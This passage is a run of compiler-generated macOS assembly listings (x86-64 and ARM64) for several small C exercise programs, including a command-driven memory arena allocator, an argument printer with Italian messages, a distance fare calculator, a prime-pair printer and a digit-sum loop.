%eax, -8(%rbp) jmp LBB6_4 LBB6_7: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _FILL ## -- Begin function FILL .p2align 4, 0x90 _FILL: ## @FILL .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl %edx, -12(%rbp) movl $0, -20(%rbp) movb $0, -21(%rbp) LBB7_1: ## =>This Loop Header: Depth=1 ## Child Loop BB7_2 Depth 2 movl -4(%rbp), %edi subl $4, %edi movl -4(%rbp), %esi subl $1, %esi callq _Length movl %eax, -28(%rbp) movl -4(%rbp), %eax movl %eax, -16(%rbp) LBB7_2: ## Parent Loop BB7_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax movl -4(%rbp), %ecx addl -28(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax ja LBB7_7 ## %bb.3: ## in Loop: Header=BB7_2 Depth=2 movl -12(%rbp), %eax movb %al, %dl movq _Arena@GOTPCREL(%rip), %rax movq (%rax), %rax movl -16(%rbp), %ecx ## kill: def $rcx killed $ecx movb %dl, (%rax,%rcx) movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) movl -20(%rbp), %eax cmpl -8(%rbp), %eax jne LBB7_5 ## %bb.4: ## in Loop: Header=BB7_1 Depth=1 movb $1, -21(%rbp) jmp LBB7_7 LBB7_5: ## in Loop: Header=BB7_2 Depth=2 jmp LBB7_6 LBB7_6: ## in Loop: Header=BB7_2 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB7_2 LBB7_7: ## in Loop: Header=BB7_1 Depth=1 movl -4(%rbp), %edi subl $12, %edi movl -4(%rbp), %esi subl $9, %esi callq _Length addl $12, %eax cmpl -4(%rbp), %eax jbe LBB7_9 ## %bb.8: ## in Loop: Header=BB7_1 Depth=1 movl -4(%rbp), %edi subl $12, %edi movl -4(%rbp), %esi subl $9, %esi callq _Length addl $12, %eax movl %eax, -4(%rbp) LBB7_9: ## in Loop: Header=BB7_1 Depth=1 jmp LBB7_10 LBB7_10: ## in Loop: Header=BB7_1 Depth=1 movb -21(%rbp), %al andb $1, %al movzbl %al, %eax cmpl $0, %eax je LBB7_1 ## %bb.11: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _parse_command ## -- Begin function parse_command .p2align 4, 0x90 _parse_command: ## @parse_command .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $128, %rsp movq %rdi, -8(%rbp) leaq L_.str.6(%rip), %rax movq %rax, -16(%rbp) movq -8(%rbp), %rdi movq -16(%rbp), %rsi callq _strtok movq %rax, -24(%rbp) movq -24(%rbp), %rdi leaq L_.str.7(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_2 ## %bb.1: movq -16(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -32(%rbp) movq -32(%rbp), %rdi callq _atoi movl %eax, -36(%rbp) movl -36(%rbp), %ecx movq _N@GOTPCREL(%rip), %rax movl %ecx, (%rax) callq _INITIALIZE jmp LBB8_17 LBB8_2: movq -24(%rbp), %rdi leaq L_.str.8(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_4 ## %bb.3: callq _FINALIZE jmp LBB8_16 LBB8_4: movq -24(%rbp), %rdi leaq L_.str.9(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_6 ## %bb.5: callq _DUMP jmp LBB8_15 LBB8_6: movq -24(%rbp), %rdi leaq L_.str.10(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_8 ## %bb.7: movq -16(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -48(%rbp) movq -48(%rbp), %rdi callq _atoi movl %eax, -52(%rbp) movl -52(%rbp), %edi callq _ALLOC jmp LBB8_14 LBB8_8: movq -24(%rbp), %rdi leaq L_.str.11(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_10 ## %bb.9: movq -16(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -64(%rbp) movq -64(%rbp), %rdi callq _atoi movl %eax, -68(%rbp) movl -68(%rbp), %edi callq _FREE jmp LBB8_13 LBB8_10: movq -24(%rbp), %rdi leaq L_.str.12(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB8_12 ## %bb.11: movq -16(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -80(%rbp) movq -80(%rbp), %rdi callq _atoi movl %eax, -84(%rbp) movq -16(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -96(%rbp) movq -96(%rbp), %rdi callq _atoi movl %eax, -100(%rbp) movq -16(%rbp), %rsi xorl %eax, %eax movl %eax, %edi callq _strtok movq %rax, -112(%rbp) movq -112(%rbp), %rdi callq _atoi movl %eax, -116(%rbp) movl -84(%rbp), %edi movl -100(%rbp), %esi movl -116(%rbp), %edx callq _FILL LBB8_12: jmp LBB8_13 LBB8_13: jmp LBB8_14 LBB8_14: jmp LBB8_15 LBB8_15: jmp LBB8_16 LBB8_16: jmp LBB8_17 LBB8_17: addq $128, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _read ## -- Begin function read .p2align 4, 0x90 _read: ## @read .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq $0, -16(%rbp) LBB9_1: ## =>This Inner Loop Header: Depth=1 movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdx leaq -16(%rbp), %rdi leaq -24(%rbp), %rsi callq _getline movq %rax, -8(%rbp) cmpq $-1, %rax je LBB9_3 ## %bb.2: ## in Loop: Header=BB9_1 Depth=1 movq -16(%rbp), %rsi leaq L_.str.13(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rdi callq _parse_command jmp LBB9_1 LBB9_3: movq -16(%rbp), %rdi callq _free addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _read xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _N,4,2 ## @N .comm _Arena,8,3 ## @Arena .comm _empty,8,3 ## @empty .comm _START_BLOC,4,2 ## @START_BLOC .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%08X\t" L_.str.1: ## @.str.1 .asciz "%02X " L_.str.2: ## @.str.2 .asciz " " L_.str.3: ## @.str.3 .asciz "\n" .comm _ind_start,4,2 ## @ind_start L_.str.4: ## @.str.4 .asciz "%d\n" .comm _nr_bloc,4,2 ## @nr_bloc L_.str.5: ## @.str.5 .asciz "0\n" L_.str.6: ## @.str.6 .asciz " \n" L_.str.7: ## @.str.7 .asciz "INITIALIZE" L_.str.8: ## @.str.8 .asciz "FINALIZE" L_.str.9: ## @.str.9 .asciz "DUMP" L_.str.10: ## @.str.10 .asciz "ALLOC" L_.str.11: ## @.str.11 .asciz "FREE" L_.str.12: ## @.str.12 .asciz "FILL" L_.str.13: ## @.str.13 .asciz "%s" .comm _ind_start_pred,4,2 ## @ind_start_pred .subsections_via_symbols
the_stack_data/107953948.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] ldur w8, [x29, #-8] ; implicit-def: $x10 mov x10, x8 ldur x8, [x29, #-16] ldr x8, [x8] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w8, [x29, #-8] subs w8, w8, #1 cset w8, le tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldur x8, [x29, #-16] ldr x8, [x8, #8] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_2 LBB0_2: ldur w8, [x29, #-8] subs w8, w8, #2 cset w8, le tbnz w8, #0, LBB0_7 b LBB0_3 LBB0_3: ldur x8, [x29, #-16] ldr x0, [x8, #16] bl _atoi stur w0, [x29, #-20] ldur w8, [x29, #-20] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ldur x8, [x29, #-16] ldr x10, [x8, #16] ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_6 LBB0_5: ldur x8, [x29, #-16] ldr x10, [x8, #16] ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w8, #-1 stur w8, [x29, #-4] b LBB0_8 LBB0_6: b LBB0_7 LBB0_7: stur wzr, [x29, #-4] b LBB0_8 LBB0_8: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "forse...(numero parametri: %d) %s\n" l_.str.1: ; @.str.1 .asciz "primo argomento utente: %s\n" l_.str.2: ; @.str.2 .asciz "Secondo argomento utente (%s) valido %d\n" l_.str.3: ; @.str.3 .asciz "Secondo argomento utente (%s) non valido %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movl -8(%rbp), %esi movq -16(%rbp), %rax movq (%rax), %rdx leaq L_.str(%rip), %rdi movb $0, %al callq _printf cmpl $1, -8(%rbp) jle LBB0_2 ## %bb.1: movq -16(%rbp), %rax movq 8(%rax), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB0_2: cmpl $2, -8(%rbp) jle LBB0_7 ## %bb.3: movq -16(%rbp), %rax movq 16(%rax), %rdi callq _atoi movl %eax, -20(%rbp) cmpl $0, -20(%rbp) je LBB0_5 ## %bb.4: movq -16(%rbp), %rax movq 16(%rax), %rsi movl -20(%rbp), %edx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB0_6 LBB0_5: movq -16(%rbp), %rax movq 16(%rax), %rsi movl -20(%rbp), %edx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl $-1, -4(%rbp) jmp LBB0_8 LBB0_6: jmp LBB0_7 LBB0_7: movl $0, -4(%rbp) LBB0_8: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "forse...(numero parametri: %d) %s\n" L_.str.1: ## @.str.1 .asciz "primo argomento utente: %s\n" L_.str.2: ## @.str.2 .asciz "Secondo argomento utente (%s) valido %d\n" L_.str.3: ## @.str.3 .asciz "Secondo argomento utente (%s) non valido %d\n" .subsections_via_symbols
the_stack_data/6388435.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __DATA,__data .globl _constvar ; @constvar .p2align 2 _constvar: .long 5 ; 0x5 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __DATA,__data .globl _constvar ## @constvar .p2align 2 _constvar: .long 5 ## 0x5 .subsections_via_symbols
the_stack_data/27816.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp add x8, sp, #8 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldr s0, [sp, #8] fmov s1, #30.00000000 fcmp s0, s1 cset w8, hi tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr s1, [sp, #8] mov w8, #1112014848 fmov s0, w8 fmul s0, s0, s1 fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_3 LBB0_2: ldr s0, [sp, #8] fmov s1, #30.00000000 fsub s0, s0, s1 mov w8, #32768 movk w8, #17595, lsl #16 fmov s2, w8 mov w8, #1109393408 fmov s1, w8 fmadd s0, s0, s1, s2 fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_3 LBB0_3: mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter total distance: " l_.str.1: ; @.str.1 .asciz "%f" l_.str.2: ; @.str.2 .asciz "Your total amount= %2.f" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function main LCPI0_0: .long 0x41f00000 ## float 30 LCPI0_1: .long 0x42200000 ## float 40 LCPI0_2: .long 0x44bb8000 ## float 1500 LCPI0_3: .long 0x42480000 ## float 50 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movss LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero ucomiss -8(%rbp), %xmm0 jb LBB0_2 ## %bb.1: movss LCPI0_3(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero mulss -8(%rbp), %xmm0 cvtss2sd %xmm0, %xmm0 leaq L_.str.2(%rip), %rdi movb $1, %al callq _printf jmp LBB0_3 LBB0_2: movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero subss %xmm1, %xmm0 movss LCPI0_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 movss LCPI0_2(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero addss %xmm1, %xmm0 cvtss2sd %xmm0, %xmm0 leaq L_.str.2(%rip), %rdi movb $1, %al callq _printf LBB0_3: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter total distance: " L_.str.1: ## @.str.1 .asciz "%f" L_.str.2: ## @.str.2 .asciz "Your total amount= %2.f" .subsections_via_symbols
the_stack_data/1028269.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _print ; -- Begin function print .p2align 2 _print: ; @print .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #44] str wzr, [sp, #32] mov w8, #1 str w8, [sp, #40] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldr w8, [sp, #40] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB1_13 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 mov w8, #1 str w8, [sp, #28] mov w8, #2 str w8, [sp, #36] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #28] subs w8, w8, #1 cset w8, ne mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #36] ldr w9, [sp, #40] subs w8, w8, w9 cset w8, lt str w8, [sp, #24] ; 4-byte Folded Spill b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #24] ; 4-byte Folded Reload tbz w8, #0, LBB1_9 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #40] ldr w10, [sp, #36] sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_3 Depth=2 str wzr, [sp, #28] b LBB1_8 LBB1_8: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB1_3 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #28] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB1_11 b LBB1_10 LBB1_10: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #40] ldrsw x10, [sp, #32] add x9, sp, #48 str w8, [x9, x10, lsl #2] ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB1_11 LBB1_11: ; in Loop: Header=BB1_1 Depth=1 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB1_1 LBB1_13: str wzr, [sp, #40] b LBB1_14 LBB1_14: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #40] ldr w9, [sp, #32] subs w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_17 b LBB1_15 LBB1_15: ; in Loop: Header=BB1_14 Depth=1 ldrsw x9, [sp, #40] add x8, sp, #48 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x10 mov x10, x9 ldr w9, [sp, #40] add w9, w9, #1 ldr w9, [x8, w9, sxtw #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB1_16 LBB1_16: ; in Loop: Header=BB1_14 Depth=1 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB1_14 LBB1_17: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_19 b LBB1_18 LBB1_18: bl ___stack_chk_fail LBB1_19: mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "HI!" l_.str.1: ; @.str.1 .asciz "(%d,%d)" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _print ## -- Begin function print .p2align 4, 0x90 _print: ## @print .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp leaq L_.str(%rip), %rdi movb $0, %al callq _printf popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -52(%rbp) movl $0, -64(%rbp) movl $1, -56(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 cmpl $10, -56(%rbp) jge LBB1_13 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl $1, -68(%rbp) movl $2, -60(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $1, -68(%rbp) movb %al, -69(%rbp) ## 1-byte Spill jne LBB1_5 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movl -60(%rbp), %eax cmpl -56(%rbp), %eax setl %al movb %al, -69(%rbp) ## 1-byte Spill LBB1_5: ## in Loop: Header=BB1_3 Depth=2 movb -69(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_6 jmp LBB1_9 LBB1_6: ## in Loop: Header=BB1_3 Depth=2 movl -56(%rbp), %eax cltd idivl -60(%rbp) cmpl $0, %edx jne LBB1_8 ## %bb.7: ## in Loop: Header=BB1_3 Depth=2 movl $0, -68(%rbp) LBB1_8: ## in Loop: Header=BB1_3 Depth=2 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB1_3 LBB1_9: ## in Loop: Header=BB1_1 Depth=1 cmpl $1, -68(%rbp) jne LBB1_11 ## %bb.10: ## in Loop: Header=BB1_1 Depth=1 movl -56(%rbp), %ecx movslq -64(%rbp), %rax movl %ecx, -48(%rbp,%rax,4) movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) LBB1_11: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_12 LBB1_12: ## in Loop: Header=BB1_1 Depth=1 movl -56(%rbp), %eax addl $1, %eax movl %eax, -56(%rbp) jmp LBB1_1 LBB1_13: movl $0, -56(%rbp) LBB1_14: ## =>This Inner Loop Header: Depth=1 movl -56(%rbp), %eax movl -64(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax jge LBB1_17 ## %bb.15: ## in Loop: Header=BB1_14 Depth=1 movslq -56(%rbp), %rax movl -48(%rbp,%rax,4), %esi movl -56(%rbp), %eax addl $1, %eax cltq movl -48(%rbp,%rax,4), %edx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.16: ## in Loop: Header=BB1_14 Depth=1 movl -56(%rbp), %eax addl $1, %eax movl %eax, -56(%rbp) jmp LBB1_14 LBB1_17: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_19 ## %bb.18: xorl %eax, %eax addq $80, %rsp popq %rbp retq LBB1_19: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "HI!" L_.str.1: ## @.str.1 .asciz "(%d,%d)" .subsections_via_symbols
the_stack_data/1117985.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-44] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_6 Depth 2 ; Child Loop BB0_8 Depth 3 sub x0, x29, #24 str x0, [sp, #32] ; 8-byte Folded Spill stur xzr, [x29, #-24] stur wzr, [x0, #7] sub x8, x29, #40 stur xzr, [x29, #-40] stur wzr, [x8, #7] adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x2, [x8] mov w1, #11 bl _fgets ldr x0, [sp, #32] ; 8-byte Folded Reload adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF bl _strcspn ldr x8, [sp, #32] ; 8-byte Folded Reload add x8, x8, x0 strb wzr, [x8] ldursb w8, [x29, #-24] subs w8, w8, #48 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: b LBB0_14 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 sub x0, x29, #24 bl _strlen mov x8, x0 str w8, [sp, #48] ldr w8, [sp, #48] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldursb w8, [x29, #-24] subs w10, w8, #48 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_1 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 sub x0, x29, #40 sub x1, x29, #24 mov x2, #11 bl ___strcpy_chk b LBB0_6 LBB0_6: ; Parent Loop BB0_1 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB0_8 Depth 3 ldr w8, [sp, #48] subs w8, w8, #1 cset w8, le tbnz w8, #0, LBB0_12 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_6 Depth=2 str wzr, [sp, #44] str wzr, [sp, #40] b LBB0_8 LBB0_8: ; Parent Loop BB0_1 Depth=1 ; Parent Loop BB0_6 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #40] ldr w9, [sp, #48] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_11 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_8 Depth=3 ldr w8, [sp, #44] ldrsw x10, [sp, #40] sub x9, x29, #40 ldrsb w9, [x9, x10] subs w9, w9, #48 add w8, w8, w9 str w8, [sp, #44] b LBB0_10 LBB0_10: ; in Loop: Header=BB0_8 Depth=3 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB0_8 LBB0_11: ; in Loop: Header=BB0_6 Depth=2 sub x0, x29, #40 str x0, [sp, #24] ; 8-byte Folded Spill stur xzr, [x29, #-40] stur wzr, [x0, #7] ldr w9, [sp, #44] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] mov w1, #0 mov x2, #11 adrp x3, l_.str.2@PAGE add x3, x3, l_.str.2@PAGEOFF bl ___sprintf_chk ldr x0, [sp, #24] ; 8-byte Folded Reload bl _strlen mov x8, x0 str w8, [sp, #48] b LBB0_6 LBB0_12: ; in Loop: Header=BB0_1 Depth=1 ldr w9, [sp, #44] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_13 LBB0_13: ; in Loop: Header=BB0_1 Depth=1 b LBB0_1 LBB0_14: ldur w8, [x29, #-44] str w8, [sp, #20] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_16 b LBB0_15 LBB0_15: bl ___stack_chk_fail LBB0_16: ldr w0, [sp, #20] ; 4-byte Folded Reload ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\n" l_.str.1: ; @.str.1 .asciz "%d\n" l_.str.2: ; @.str.2 .asciz "%d" .subsections_via_symbols
